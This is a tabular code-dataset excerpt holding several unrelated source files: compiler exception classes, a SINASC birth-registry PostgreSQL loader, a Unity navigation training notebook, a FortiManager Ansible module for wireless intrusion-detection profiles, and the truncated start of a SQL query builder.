max_stars_repo_path stringlengths 3 269 | max_stars_repo_name stringlengths 4 119 | max_stars_count int64 0 191k | id stringlengths 1 7 | content stringlengths 6 1.05M | score float64 0.23 5.13 | int_score int64 0 5 |
|---|---|---|---|---|---|---|
cse4305-compilers/Exceptions.py | mqt0029/univ-courses | 0 | 12770751 | <reponame>mqt0029/univ-courses
# <NAME>
# mqt0029
# 1001540029
# 2019-05-13
#---------#---------#---------#---------#---------#--------#
class InternalError(Exception):
    """Raised for unexpected failures internal to the tool itself."""


class LexicalError(Exception):
    """Raised when scanning encounters input that forms no valid token."""


class SemanticError(Exception):
    """Raised when input is well-formed but semantically invalid."""


class SyntacticError(Exception):
    """Raised when input violates the grammar during parsing."""
#---------#---------#---------#---------#---------#--------#
| 1.570313 | 2 |
pegasus/dados/insertion/insert_into_all_SINASC.py | SecexSaudeTCU/PegaSUS | 0 | 12770752 | <reponame>SecexSaudeTCU/PegaSUS
###########################################################################################################################
# SINASC SINASC SINASC SINASC SINASC SINASC SINASC SINASC SINASC SINASC SINASC SINASC SINASC SINASC SINASC SINASC SINASC #
###########################################################################################################################
import os
import time
from datetime import datetime
import numpy as np
import pandas as pd
import psycopg2
from transform.prepare_SINASC import DataSinascMain, DataSinascAuxiliary
###########################################################################################################################
# pandas pandas pandas pandas pandas pandas pandas pandas pandas pandas pandas pandas pandas pandas pandas pandas pandas #
###########################################################################################################################
###########################################################################################################################
# AUXILIARY TABLES * AUXILIARY TABLES * AUXILIARY TABLES * AUXILIARY TABLES * AUXILIARY TABLES * AUXILIARY TABLES #
###########################################################################################################################
# Função que utiliza "pandas.to_sql" para a inserção de dados não principais no banco de dados "child_db"
def insert_into_most_SINASC_tables(path, device, child_db):
    """Load the SINASC auxiliary (lookup) tables into the ``child_db`` schema.

    Uses ``pandas.DataFrame.to_sql`` for each auxiliary table produced by
    ``DataSinascAuxiliary``.

    Parameters:
        path: directory handed to ``DataSinascAuxiliary`` to locate raw files.
        device: SQLAlchemy engine/connection used by ``to_sql``.
        child_db: name of the target schema ("child database").
    """
    # (getter method of DataSinascAuxiliary, destination table), kept in the
    # exact order the inserts were originally performed.  CADMUN feeds three
    # tables and RACA feeds two, so their DataFrames are reused via a cache.
    table_loaders = [
        ('get_CNESDN_treated', 'codestab'),
        ('get_TABUF_treated', 'ufcod'),
        ('get_RSAUDE_treated', 'rsaude'),
        ('get_CADMUN_treated', 'codmunnasc'),
        ('get_LOCOCOR_treated', 'locnasc'),
        ('get_SITCONJU_treated', 'estcivmae'),
        ('get_INSTRUC_treated', 'escmae'),
        ('get_TABOCUP_2TCC_treated', 'codocupmae'),
        ('get_SEMANAS_treated', 'gestacao'),
        ('get_CADMUN_treated', 'codmunres'),    # same DataFrame as codmunnasc
        ('get_GRAVIDEZ_treated', 'gravidez'),
        ('get_PARTO_treated', 'parto'),
        ('get_CONSULT_treated', 'consultas'),
        ('get_RACA_treated', 'racacor'),
        ('get_CID10_treated', 'codanomal'),
        ('get_NAT1212_treated', 'naturalmae'),
        ('get_CADMUN_treated', 'codmunnatu'),   # same DataFrame as codmunnasc
        ('get_ESC2010_treated', 'escmae2010'),
        ('get_RACA_treated', 'racacormae'),     # same DataFrame as racacor
        ('get_TPMETODO_treated', 'tpmetestim'),
        ('get_TPAPRESENT_treated', 'tpapresent'),
        ('get_STTRABPART_treated', 'sttrabpart'),
        ('get_STPARTO_treated', 'stcesparto'),
        ('get_TPASSIST_treated', 'tpnascassi'),
        ('get_TPFUNCRESP_treated', 'tpfuncresp'),
        ('get_ESCAGR1_treated', 'escmaeagr1'),
        ('get_TABPAIS_treated', 'codpaisres'),
        ('get_ROBSON_treated', 'tprobson'),
    ]
    # Instance that fetches and treats each auxiliary table.
    data_sinasc_auxiliary = DataSinascAuxiliary(path)
    # Cache keyed by getter name so each getter runs at most once.
    frames = {}
    for getter_name, table_name in table_loaders:
        if getter_name not in frames:
            frames[getter_name] = getattr(data_sinasc_auxiliary, getter_name)()
        # NOTE: index_label='ID' is kept for parity with the original calls,
        # though it has no effect when index=False.
        frames[getter_name].to_sql(table_name, con=device, schema=child_db,
                                   if_exists='append', index=False,
                                   index_label='ID')
###########################################################################################################################
# copy_expert+pandas copy_expert+pandas copy_expert+pandas copy_expert+pandas copy_expert+pandas copy_expert+pandas #
###########################################################################################################################
###########################################################################################################################
# MAIN TABLE * MAIN TABLE * MAIN TABLE * MAIN TABLE * MAIN TABLE * MAIN TABLE * MAIN TABLE * MAIN TABLE * MAIN TABLE #
###########################################################################################################################
# Função que utiliza "copy_expert" para a inserção de dados principais e "pandas.to_sql" para a inserção
# dos respectivos metadados no banco de dados "child_db"
def insert_into_main_table_and_arquivos(file_name, directory, date_ftp, device, child_db, connection_data):
    """Insert one SINASC main data file into its table plus its metadata row.

    Bulk-loads the treated DN file via psycopg2 ``copy_expert`` (falling back
    to ``pandas.to_sql`` on failure) and records the load in the ``arquivos``
    metadata table.

    Parameters:
        file_name: name shaped like ``DNUFYYYY`` (base, state/UF, year).
        directory: FTP directory the file came from (metadata only).
        date_ftp: FTP insertion date of the file (metadata only).
        device: SQLAlchemy engine/connection for pandas operations.
        child_db: target schema name.
        connection_data: (dbname, host, port, user, password) for psycopg2.
    """
    start = time.time()
    # How many main data files were already loaded (per the "arquivos" table).
    counting_rows = pd.read_sql(f'''SELECT COUNT('NOME') FROM {child_db}.arquivos''', con=device)
    # NOTE(review): relies on PostgreSQL labelling the COUNT(...) result column
    # "count" — confirm against the server version in use.
    qtd_files_pg = counting_rows.iloc[0]['count']
    print(f'A quantidade de arquivos principais de dados do {child_db} já carregada no {connection_data[0]}/PostgreSQL é {qtd_files_pg}.')
    # File name layout: BBUUYYYY -> base (e.g. "DN"), state (UF) and year.
    base = file_name[0:2]
    state = file_name[2:4]
    year = file_name[4:8]
    main_table = base.lower() + 'br'
    print(f'\nIniciando a lida com o arquivo DN{state}{year}...')
    # Fetch and treat the main DN file for this state/year.
    data_sinasc_main = DataSinascMain(state, year)
    df = data_sinasc_main.get_DNXXaaaa_treated()
    # Add UF_DN and ANO_DN columns identifying the file's state and year.
    df.insert(1, 'UF_' + base, [state] * df.shape[0])
    df.insert(2, 'ANO_' + base, [int(year)] * df.shape[0])
    # Dump the treated data to a temporary CSV for the COPY bulk load.
    csv_name = base + state + year + '.csv'
    df.to_csv(csv_name, sep=',', header=False, index=False, escapechar=' ')
    # Direct psycopg2 connection to the mother database for COPY.
    conn = psycopg2.connect(dbname=connection_data[0],
                            host=connection_data[1],
                            port=connection_data[2],
                            user=connection_data[3],
                            password=connection_data[4])
    try:
        with open(csv_name, 'r') as f:
            cursor = conn.cursor()
            try:
                # Bulk load via COPY — much faster than row-by-row inserts.
                cursor.copy_expert(f'''COPY {child_db}.{main_table} FROM STDIN WITH CSV DELIMITER AS ',';''', f)
            except Exception:
                # The failed COPY left the transaction aborted; roll it back
                # before falling back to the slower pandas insertion path.
                conn.rollback()
                print(f'Tentando a inserção do arquivo {base}{state}{year} por método alternativo (pandas)...')
                df.to_sql(main_table, con=device, schema=child_db, if_exists='append', index=False)
            else:
                conn.commit()
            finally:
                cursor.close()
    finally:
        conn.close()
        # Remove the temporary CSV even if the insertion failed.
        os.remove(csv_name)
    print(f'Terminou de inserir os dados do arquivo {base}{state}{year} na tabela {main_table} do banco de dados {child_db}.')
    # One-row DataFrame describing the file just loaded.
    file_data = pd.DataFrame(data=[[file_name, directory, date_ftp, datetime.today(), int(df.shape[0])]],
                             columns=['NOME', 'DIRETORIO', 'DATA_INSERCAO_FTP', 'DATA_HORA_CARGA', 'QTD_REGISTROS'],
                             index=None)
    # Record the load in the metadata table.
    file_data.to_sql('arquivos', con=device, schema=child_db, if_exists='append', index=False)
    print(f'Terminou de inserir os metadados do arquivo {base}{state}{year} na tabela arquivos do banco de dados {child_db}.')
    end = time.time()
    print(f'Demorou {round((end - start)/60, 1)} minutos para essas duas inserções no {connection_data[0]}/PostgreSQL!')
| 1.632813 | 2 |
Navigation.py | jvalderr239/DeepQNetwork | 0 | 12770753 | #!/usr/bin/env python
# coding: utf-8
# # Navigation
#
# ---
#
# You are welcome to use this coding environment to train your agent for the project. Follow the instructions below to get started!
#
# ### 1. Start the Environment
#
# Run the next code cell to install a few packages. This line will take a few minutes to run!
# In[ ]:
get_ipython().system('pip -q install ./python')
# The environment is already saved in the Workspace and can be accessed at the file path provided below. Please run the next code cell without making any changes.
# In[ ]:
from unityagents import UnityEnvironment
import numpy as np
# please do not modify the line below
env = UnityEnvironment(file_name="/data/Banana_Linux_NoVis/Banana.x86_64")
# Environments contain **_brains_** which are responsible for deciding the actions of their associated agents. Here we check for the first brain available, and set it as the default brain we will be controlling from Python.
# In[ ]:
# get the default brain
brain_name = env.brain_names[0]
brain = env.brains[brain_name]
# ### 2. Examine the State and Action Spaces
#
# Run the code cell below to print some information about the environment.
# In[ ]:
# reset the environment
env_info = env.reset(train_mode=True)[brain_name]
# number of agents in the environment
print('Number of agents:', len(env_info.agents))
# number of actions
action_size = brain.vector_action_space_size
print('Number of actions:', action_size)
# examine the state space
state = env_info.vector_observations[0]
print('States look like:', state)
state_size = len(state)
print('States have length:', state_size)
# ### 3. Take Random Actions in the Environment
#
# In the next code cell, you will learn how to use the Python API to control the agent and receive feedback from the environment.
#
# Note that **in this coding environment, you will not be able to watch the agent while it is training**, and you should set `train_mode=True` to restart the environment.
# In[ ]:
env_info = env.reset(train_mode=True)[brain_name] # reset the environment
state = env_info.vector_observations[0] # get the current state
score = 0 # initialize the score
while True:
action = np.random.randint(action_size) # select an action
env_info = env.step(action)[brain_name] # send the action to the environment
next_state = env_info.vector_observations[0] # get the next state
reward = env_info.rewards[0] # get the reward
done = env_info.local_done[0] # see if episode has finished
score += reward # update the score
state = next_state # roll over the state to next time step
if done: # exit loop if episode finished
break
print("Score: {}".format(score))
# When finished, you can close the environment.
# In[ ]:
env.close()
# ### 4. It's Your Turn!
#
# Now it's your turn to train your own agent to solve the environment! A few **important notes**:
# - When training the environment, set `train_mode=True`, so that the line for resetting the environment looks like the following:
# ```python
# env_info = env.reset(train_mode=True)[brain_name]
# ```
# - To structure your work, you're welcome to work directly in this Jupyter notebook, or you might like to start over with a new file! You can see the list of files in the workspace by clicking on **_Jupyter_** in the top left corner of the notebook.
# - In this coding environment, you will not be able to watch the agent while it is training. However, **_after training the agent_**, you can download the saved model weights to watch the agent on your own machine!
| 3.015625 | 3 |
intro-ansible/venv3/lib/python3.8/site-packages/ansible_collections/fortinet/fortimanager/plugins/modules/fmgr_widsprofile.py | Stienvdh/statrick | 0 | 12770754 | #!/usr/bin/python
from __future__ import absolute_import, division, print_function
# Copyright 2019-2020 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
__metaclass__ = type  # Python-2 compatibility: make classes new-style.

# Module maturity/support metadata consumed by Ansible tooling.
ANSIBLE_METADATA = {'status': ['preview'],
                    'supported_by': 'community',
                    'metadata_version': '1.1'}
DOCUMENTATION = '''
---
module: fmgr_widsprofile
short_description: Configure wireless intrusion detection system (WIDS) profiles.
description:
- This module is able to configure a FortiManager device.
- Examples include all parameters and values which need to be adjusted to data sources before usage.
version_added: "2.10"
author:
- <NAME> (@chillancezen)
- <NAME> (@JieX19)
- <NAME> (@fshen01)
- <NAME> (@fgtdev-hblu)
notes:
- Running in workspace locking mode is supported in this FortiManager module, the top
level parameters workspace_locking_adom and workspace_locking_timeout help do the work.
- To create or update an object, use state present directive.
- To delete an object, use state absent directive.
- Normally, running one module can fail when a non-zero rc is returned. you can also override
the conditions to fail or succeed with parameters rc_failed and rc_succeeded
options:
bypass_validation:
description: only set to True when module schema diffs with FortiManager API structure, module continues to execute without validating parameters
required: false
type: bool
default: false
workspace_locking_adom:
description: the adom to lock for FortiManager running in workspace mode, the value can be global and others including root
required: false
type: str
workspace_locking_timeout:
description: the maximum time in seconds to wait for other user to release the workspace lock
required: false
type: int
default: 300
state:
description: the directive to create, update or delete an object
type: str
required: true
choices:
- present
- absent
rc_succeeded:
        description: the rc codes list with which the conditions to succeed will be overridden
type: list
required: false
rc_failed:
        description: the rc codes list with which the conditions to fail will be overridden
type: list
required: false
adom:
description: the parameter (adom) in requested url
type: str
required: true
widsprofile:
description: the top level parameters set
required: false
type: dict
suboptions:
ap-auto-suppress:
type: str
description: 'Enable/disable on-wire rogue AP auto-suppression (default = disable).'
choices:
- 'disable'
- 'enable'
ap-bgscan-disable-day:
description: no description
type: list
choices:
- sunday
- monday
- tuesday
- wednesday
- thursday
- friday
- saturday
ap-bgscan-disable-end:
type: str
description: 'End time, using a 24-hour clock in the format of hh:mm, for disabling background scanning (default = 00:00).'
ap-bgscan-disable-start:
type: str
description: 'Start time, using a 24-hour clock in the format of hh:mm, for disabling background scanning (default = 00:00).'
ap-bgscan-duration:
type: int
description: 'Listening time on a scanning channel (10 - 1000 msec, default = 20).'
ap-bgscan-idle:
type: int
description: 'Waiting time for channel inactivity before scanning this channel (0 - 1000 msec, default = 0).'
ap-bgscan-intv:
type: int
description: 'Period of time between scanning two channels (1 - 600 sec, default = 1).'
ap-bgscan-period:
type: int
description: 'Period of time between background scans (60 - 3600 sec, default = 600).'
ap-bgscan-report-intv:
type: int
description: 'Period of time between background scan reports (15 - 600 sec, default = 30).'
ap-fgscan-report-intv:
type: int
description: 'Period of time between foreground scan reports (15 - 600 sec, default = 15).'
ap-scan:
type: str
description: 'Enable/disable rogue AP detection.'
choices:
- 'disable'
- 'enable'
ap-scan-passive:
type: str
description: 'Enable/disable passive scanning. Enable means do not send probe request on any channels (default = disable).'
choices:
- 'disable'
- 'enable'
asleap-attack:
type: str
description: 'Enable/disable asleap attack detection (default = disable).'
choices:
- 'disable'
- 'enable'
assoc-flood-thresh:
type: int
description: 'The threshold value for association frame flooding.'
assoc-flood-time:
type: int
description: 'Number of seconds after which a station is considered not connected.'
assoc-frame-flood:
type: str
description: 'Enable/disable association frame flooding detection (default = disable).'
choices:
- 'disable'
- 'enable'
auth-flood-thresh:
type: int
description: 'The threshold value for authentication frame flooding.'
auth-flood-time:
type: int
description: 'Number of seconds after which a station is considered not connected.'
auth-frame-flood:
type: str
description: 'Enable/disable authentication frame flooding detection (default = disable).'
choices:
- 'disable'
- 'enable'
comment:
type: str
description: 'Comment.'
deauth-broadcast:
type: str
description: 'Enable/disable broadcasting de-authentication detection (default = disable).'
choices:
- 'disable'
- 'enable'
deauth-unknown-src-thresh:
type: int
description: 'Threshold value per second to deauth unknown src for DoS attack (0: no limit).'
eapol-fail-flood:
type: str
description: 'Enable/disable EAPOL-Failure flooding (to AP) detection (default = disable).'
choices:
- 'disable'
- 'enable'
eapol-fail-intv:
type: int
description: 'The detection interval for EAPOL-Failure flooding (1 - 3600 sec).'
eapol-fail-thresh:
type: int
description: 'The threshold value for EAPOL-Failure flooding in specified interval.'
eapol-logoff-flood:
type: str
description: 'Enable/disable EAPOL-Logoff flooding (to AP) detection (default = disable).'
choices:
- 'disable'
- 'enable'
eapol-logoff-intv:
type: int
description: 'The detection interval for EAPOL-Logoff flooding (1 - 3600 sec).'
eapol-logoff-thresh:
type: int
description: 'The threshold value for EAPOL-Logoff flooding in specified interval.'
eapol-pre-fail-flood:
type: str
description: 'Enable/disable premature EAPOL-Failure flooding (to STA) detection (default = disable).'
choices:
- 'disable'
- 'enable'
eapol-pre-fail-intv:
type: int
description: 'The detection interval for premature EAPOL-Failure flooding (1 - 3600 sec).'
eapol-pre-fail-thresh:
type: int
description: 'The threshold value for premature EAPOL-Failure flooding in specified interval.'
eapol-pre-succ-flood:
type: str
description: 'Enable/disable premature EAPOL-Success flooding (to STA) detection (default = disable).'
choices:
- 'disable'
- 'enable'
eapol-pre-succ-intv:
type: int
description: 'The detection interval for premature EAPOL-Success flooding (1 - 3600 sec).'
eapol-pre-succ-thresh:
type: int
description: 'The threshold value for premature EAPOL-Success flooding in specified interval.'
eapol-start-flood:
type: str
description: 'Enable/disable EAPOL-Start flooding (to AP) detection (default = disable).'
choices:
- 'disable'
- 'enable'
eapol-start-intv:
type: int
description: 'The detection interval for EAPOL-Start flooding (1 - 3600 sec).'
eapol-start-thresh:
type: int
description: 'The threshold value for EAPOL-Start flooding in specified interval.'
eapol-succ-flood:
type: str
description: 'Enable/disable EAPOL-Success flooding (to AP) detection (default = disable).'
choices:
- 'disable'
- 'enable'
eapol-succ-intv:
type: int
description: 'The detection interval for EAPOL-Success flooding (1 - 3600 sec).'
eapol-succ-thresh:
type: int
description: 'The threshold value for EAPOL-Success flooding in specified interval.'
invalid-mac-oui:
type: str
description: 'Enable/disable invalid MAC OUI detection.'
choices:
- 'disable'
- 'enable'
long-duration-attack:
type: str
description: 'Enable/disable long duration attack detection based on user configured threshold (default = disable).'
choices:
- 'disable'
- 'enable'
long-duration-thresh:
type: int
description: 'Threshold value for long duration attack detection (1000 - 32767 usec, default = 8200).'
name:
type: str
description: 'WIDS profile name.'
null-ssid-probe-resp:
type: str
description: 'Enable/disable null SSID probe response detection (default = disable).'
choices:
- 'disable'
- 'enable'
sensor-mode:
type: str
description: 'Scan WiFi nearby stations (default = disable).'
choices:
- 'disable'
- 'foreign'
- 'both'
spoofed-deauth:
type: str
description: 'Enable/disable spoofed de-authentication attack detection (default = disable).'
choices:
- 'disable'
- 'enable'
weak-wep-iv:
type: str
description: 'Enable/disable weak WEP IV (Initialization Vector) detection (default = disable).'
choices:
- 'disable'
- 'enable'
wireless-bridge:
type: str
description: 'Enable/disable wireless bridge detection (default = disable).'
choices:
- 'disable'
- 'enable'
'''
EXAMPLES = '''
- hosts: fortimanager-inventory
collections:
- fortinet.fortimanager
connection: httpapi
vars:
ansible_httpapi_use_ssl: True
ansible_httpapi_validate_certs: False
ansible_httpapi_port: 443
tasks:
- name: Configure wireless intrusion detection system (WIDS) profiles.
fmgr_widsprofile:
bypass_validation: False
workspace_locking_adom: <value in [global, custom adom including root]>
workspace_locking_timeout: 300
rc_succeeded: [0, -2, -3, ...]
rc_failed: [-2, -3, ...]
adom: <your own value>
state: <value in [present, absent]>
widsprofile:
ap-auto-suppress: <value in [disable, enable]>
ap-bgscan-disable-day:
- sunday
- monday
- tuesday
- wednesday
- thursday
- friday
- saturday
ap-bgscan-disable-end: <value of string>
ap-bgscan-disable-start: <value of string>
ap-bgscan-duration: <value of integer>
ap-bgscan-idle: <value of integer>
ap-bgscan-intv: <value of integer>
ap-bgscan-period: <value of integer>
ap-bgscan-report-intv: <value of integer>
ap-fgscan-report-intv: <value of integer>
ap-scan: <value in [disable, enable]>
ap-scan-passive: <value in [disable, enable]>
asleap-attack: <value in [disable, enable]>
assoc-flood-thresh: <value of integer>
assoc-flood-time: <value of integer>
assoc-frame-flood: <value in [disable, enable]>
auth-flood-thresh: <value of integer>
auth-flood-time: <value of integer>
auth-frame-flood: <value in [disable, enable]>
comment: <value of string>
deauth-broadcast: <value in [disable, enable]>
deauth-unknown-src-thresh: <value of integer>
eapol-fail-flood: <value in [disable, enable]>
eapol-fail-intv: <value of integer>
eapol-fail-thresh: <value of integer>
eapol-logoff-flood: <value in [disable, enable]>
eapol-logoff-intv: <value of integer>
eapol-logoff-thresh: <value of integer>
eapol-pre-fail-flood: <value in [disable, enable]>
eapol-pre-fail-intv: <value of integer>
eapol-pre-fail-thresh: <value of integer>
eapol-pre-succ-flood: <value in [disable, enable]>
eapol-pre-succ-intv: <value of integer>
eapol-pre-succ-thresh: <value of integer>
eapol-start-flood: <value in [disable, enable]>
eapol-start-intv: <value of integer>
eapol-start-thresh: <value of integer>
eapol-succ-flood: <value in [disable, enable]>
eapol-succ-intv: <value of integer>
eapol-succ-thresh: <value of integer>
invalid-mac-oui: <value in [disable, enable]>
long-duration-attack: <value in [disable, enable]>
long-duration-thresh: <value of integer>
name: <value of string>
null-ssid-probe-resp: <value in [disable, enable]>
sensor-mode: <value in [disable, foreign, both]>
spoofed-deauth: <value in [disable, enable]>
weak-wep-iv: <value in [disable, enable]>
wireless-bridge: <value in [disable, enable]>
'''
RETURN = '''
request_url:
description: The full url requested
returned: always
type: str
sample: /sys/login/user
response_code:
description: The status of api request
returned: always
type: int
sample: 0
response_message:
description: The descriptive message of the api response
type: str
returned: always
sample: OK.
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.connection import Connection
from ansible_collections.fortinet.fortimanager.plugins.module_utils.napi import NAPIManager
from ansible_collections.fortinet.fortimanager.plugins.module_utils.napi import check_galaxy_version
from ansible_collections.fortinet.fortimanager.plugins.module_utils.napi import check_parameter_bypass
def main():
jrpc_urls = [
'/pm/config/adom/{adom}/obj/wireless-controller/wids-profile',
'/pm/config/global/obj/wireless-controller/wids-profile'
]
perobject_jrpc_urls = [
'/pm/config/adom/{adom}/obj/wireless-controller/wids-profile/{wids-profile}',
'/pm/config/global/obj/wireless-controller/wids-profile/{wids-profile}'
]
url_params = ['adom']
module_primary_key = 'name'
module_arg_spec = {
'bypass_validation': {
'type': 'bool',
'required': False,
'default': False
},
'workspace_locking_adom': {
'type': 'str',
'required': False
},
'workspace_locking_timeout': {
'type': 'int',
'required': False,
'default': 300
},
'rc_succeeded': {
'required': False,
'type': 'list'
},
'rc_failed': {
'required': False,
'type': 'list'
},
'state': {
'type': 'str',
'required': True,
'choices': [
'present',
'absent'
]
},
'adom': {
'required': True,
'type': 'str'
},
'widsprofile': {
'required': False,
'type': 'dict',
'options': {
'ap-auto-suppress': {
'required': False,
'choices': [
'disable',
'enable'
],
'type': 'str'
},
'ap-bgscan-disable-day': {
'required': False,
'type': 'list',
'choices': [
'sunday',
'monday',
'tuesday',
'wednesday',
'thursday',
'friday',
'saturday'
]
},
'ap-bgscan-disable-end': {
'required': False,
'type': 'str'
},
'ap-bgscan-disable-start': {
'required': False,
'type': 'str'
},
'ap-bgscan-duration': {
'required': False,
'type': 'int'
},
'ap-bgscan-idle': {
'required': False,
'type': 'int'
},
'ap-bgscan-intv': {
'required': False,
'type': 'int'
},
'ap-bgscan-period': {
'required': False,
'type': 'int'
},
'ap-bgscan-report-intv': {
'required': False,
'type': 'int'
},
'ap-fgscan-report-intv': {
'required': False,
'type': 'int'
},
'ap-scan': {
'required': False,
'choices': [
'disable',
'enable'
],
'type': 'str'
},
'ap-scan-passive': {
'required': False,
'choices': [
'disable',
'enable'
],
'type': 'str'
},
'asleap-attack': {
'required': False,
'choices': [
'disable',
'enable'
],
'type': 'str'
},
'assoc-flood-thresh': {
'required': False,
'type': 'int'
},
'assoc-flood-time': {
'required': False,
'type': 'int'
},
'assoc-frame-flood': {
'required': False,
'choices': [
'disable',
'enable'
],
'type': 'str'
},
'auth-flood-thresh': {
'required': False,
'type': 'int'
},
'auth-flood-time': {
'required': False,
'type': 'int'
},
'auth-frame-flood': {
'required': False,
'choices': [
'disable',
'enable'
],
'type': 'str'
},
'comment': {
'required': False,
'type': 'str'
},
'deauth-broadcast': {
'required': False,
'choices': [
'disable',
'enable'
],
'type': 'str'
},
'deauth-unknown-src-thresh': {
'required': False,
'type': 'int'
},
'eapol-fail-flood': {
'required': False,
'choices': [
'disable',
'enable'
],
'type': 'str'
},
'eapol-fail-intv': {
'required': False,
'type': 'int'
},
'eapol-fail-thresh': {
'required': False,
'type': 'int'
},
'eapol-logoff-flood': {
'required': False,
'choices': [
'disable',
'enable'
],
'type': 'str'
},
'eapol-logoff-intv': {
'required': False,
'type': 'int'
},
'eapol-logoff-thresh': {
'required': False,
'type': 'int'
},
'eapol-pre-fail-flood': {
'required': False,
'choices': [
'disable',
'enable'
],
'type': 'str'
},
'eapol-pre-fail-intv': {
'required': False,
'type': 'int'
},
'eapol-pre-fail-thresh': {
'required': False,
'type': 'int'
},
'eapol-pre-succ-flood': {
'required': False,
'choices': [
'disable',
'enable'
],
'type': 'str'
},
'eapol-pre-succ-intv': {
'required': False,
'type': 'int'
},
'eapol-pre-succ-thresh': {
'required': False,
'type': 'int'
},
'eapol-start-flood': {
'required': False,
'choices': [
'disable',
'enable'
],
'type': 'str'
},
'eapol-start-intv': {
'required': False,
'type': 'int'
},
'eapol-start-thresh': {
'required': False,
'type': 'int'
},
'eapol-succ-flood': {
'required': False,
'choices': [
'disable',
'enable'
],
'type': 'str'
},
'eapol-succ-intv': {
'required': False,
'type': 'int'
},
'eapol-succ-thresh': {
'required': False,
'type': 'int'
},
'invalid-mac-oui': {
'required': False,
'choices': [
'disable',
'enable'
],
'type': 'str'
},
'long-duration-attack': {
'required': False,
'choices': [
'disable',
'enable'
],
'type': 'str'
},
'long-duration-thresh': {
'required': False,
'type': 'int'
},
'name': {
'required': True,
'type': 'str'
},
'null-ssid-probe-resp': {
'required': False,
'choices': [
'disable',
'enable'
],
'type': 'str'
},
'sensor-mode': {
'required': False,
'choices': [
'disable',
'foreign',
'both'
],
'type': 'str'
},
'spoofed-deauth': {
'required': False,
'choices': [
'disable',
'enable'
],
'type': 'str'
},
'weak-wep-iv': {
'required': False,
'choices': [
'disable',
'enable'
],
'type': 'str'
},
'wireless-bridge': {
'required': False,
'choices': [
'disable',
'enable'
],
'type': 'str'
}
}
}
}
params_validation_blob = []
check_galaxy_version(module_arg_spec)
module = AnsibleModule(argument_spec=check_parameter_bypass(module_arg_spec, 'widsprofile'),
supports_check_mode=False)
fmgr = None
if module._socket_path:
connection = Connection(module._socket_path)
fmgr = NAPIManager(jrpc_urls, perobject_jrpc_urls, module_primary_key, url_params, module, connection, top_level_schema_name='data')
fmgr.validate_parameters(params_validation_blob)
fmgr.process_curd()
else:
module.fail_json(msg='MUST RUN IN HTTPAPI MODE')
module.exit_json(meta=module.params)
# Standard Ansible module entry point: run main() only when executed directly.
if __name__ == '__main__':
    main()
| 1.375 | 1 |
curd/connections/utils/sql.py | jdxin0/curd | 8 | 12770755 | from datetime import datetime, timezone
class BaseClause(object):
    """Base for SQL clause fragments: a field name plus a value.

    ``field`` is exposed backtick-quoted per dotted component;
    ``value`` normalizes timezone-aware datetimes to naive UTC before
    they are handed to the database driver.
    """

    def __init__(self, field, value):
        self._field = field
        self._value = value

    @property
    def field(self):
        # Quote each dotted component: 'db.tbl' -> '`db`.`tbl`'.
        # Strip existing backticks first to avoid double quoting.
        return '.'.join(
            ['`{}`'.format(i) for i in self._field.replace('`', '').split('.')])

    @staticmethod
    def _normalize(v):
        # Convert a tz-aware datetime to naive UTC; pass anything else through.
        if isinstance(v, datetime) and v.tzinfo:
            return v.astimezone(tz=timezone.utc).replace(tzinfo=None)
        return v

    @property
    def value(self):
        if isinstance(self._value, (list, tuple)):
            # BUGFIX: the original tested the *container* for datetime-ness
            # (isinstance(self._value, datetime)) inside this branch, so
            # aware datetimes in lists/tuples were never converted to UTC.
            return [self._normalize(v) for v in self._value]
        return self._normalize(self._value)
class WhereClause(BaseClause):
    """A single WHERE predicate: field, comparison operator, value."""

    def __init__(self, field, operator, value):
        super().__init__(field, value)
        if value is None:
            # SQL compares against NULL with IS / IS NOT, not = / !=.
            operator = {'=': 'IS', '!=': 'IS NOT'}.get(operator, operator)
        self._operator = operator

    @property
    def operator(self):
        return self._operator
class FieldClause(BaseClause):
    """A clause representing a bare field/table name with no value.

    Delegates to BaseClause with a ``None`` value: the original skipped
    ``super().__init__`` and never set ``_value``, so accessing the
    inherited ``value`` property raised AttributeError.
    """

    def __init__(self, field):
        super().__init__(field, None)
# A field/value pair used in INSERT and UPDATE statements; the base
# class already provides all the quoting/normalization behavior needed.
class AssignmentClause(BaseClause):
    pass
class BaseSQLStatement(object):
    """Shared machinery for building parameterized SQL statements.

    Subclasses compose the query string with the ``generate_query_*``
    helpers; positional parameter values accumulate in ``self.params``
    in the order they appear in the rendered query.
    """

    def __init__(self):
        self.query = None
        self.params = []

    def generate_query_field(self, table):
        # Backtick-quoted table (or column) name.
        return table.field

    def generate_query_where(self, where):
        """Render a WHERE clause, appending values to self.params."""
        query = ''
        if where:
            query += 'WHERE '
            segs = []
            for where_clause in where:
                if where_clause.operator == 'IN':
                    # One %s placeholder per element of the IN list.
                    value_count = len(where_clause.value)
                    segs.append(
                        '{} {} {}'.format(
                            where_clause.field,
                            where_clause.operator,
                            '({})'.format(', '.join(['%s'] * value_count))
                        )
                    )
                    self.params.extend(where_clause.value)
                else:
                    segs.append(
                        '{} {} {}'.format(
                            where_clause.field, where_clause.operator, '%s'
                        )
                    )
                    self.params.append(where_clause.value)
            query += ' AND '.join(segs)
        return query

    def generate_query_fields(self, fields):
        # SELECT column list; '*' when no explicit fields were given.
        if fields:
            return ', '.join([field_clause.field for field_clause in fields])
        else:
            return '*'

    def generate_query_limit(self, limit):
        if limit:
            return 'LIMIT {}'.format(limit)
        else:
            return ''

    @staticmethod
    def _quoted(name):
        # Same quoting rule as BaseClause.field, usable on a raw string.
        return '.'.join(
            '`{}`'.format(part) for part in name.replace('`', '').split('.'))

    def generate_query_order_by(self, order_by):
        """Render ORDER BY; a leading '-' on a field name means DESC.

        BUGFIX: the original stripped the '-' by assigning back to the
        caller's clause object (``field_clause._field = ...``), mutating
        objects it does not own; we now leave them untouched.
        """
        query = ''
        if order_by:
            query += 'ORDER BY '
            segs = []
            for field_clause in order_by:
                raw = field_clause._field
                if raw.startswith('-'):
                    seg = self._quoted(raw[1:]) + ' DESC'
                else:
                    seg = field_clause.field
                segs.append(seg)
            query += ', '.join(segs)
        return query
class SelectStatement(BaseSQLStatement):
    """Builds a parameterized ``SELECT ... FROM ...`` statement."""

